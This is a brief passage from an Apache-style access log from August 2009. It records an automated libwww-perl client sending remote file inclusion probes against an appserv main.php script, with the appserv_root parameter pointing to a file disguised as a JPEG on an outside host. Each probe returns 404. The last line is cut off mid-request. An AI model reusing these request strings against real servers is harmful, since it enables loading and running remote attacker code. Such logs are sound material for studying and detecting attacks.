66.232.145.150 - - [02/Aug/2009:06:47:37 -0400] "GET /logs///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:06:47:37 -0400] "GET ///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:06:47:37 -0400] "GET /logs/access_log.Q109051800///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
74.53.201.178 - - [02/Aug/2009:06:49:18 -0400] "GET //modules/vwar/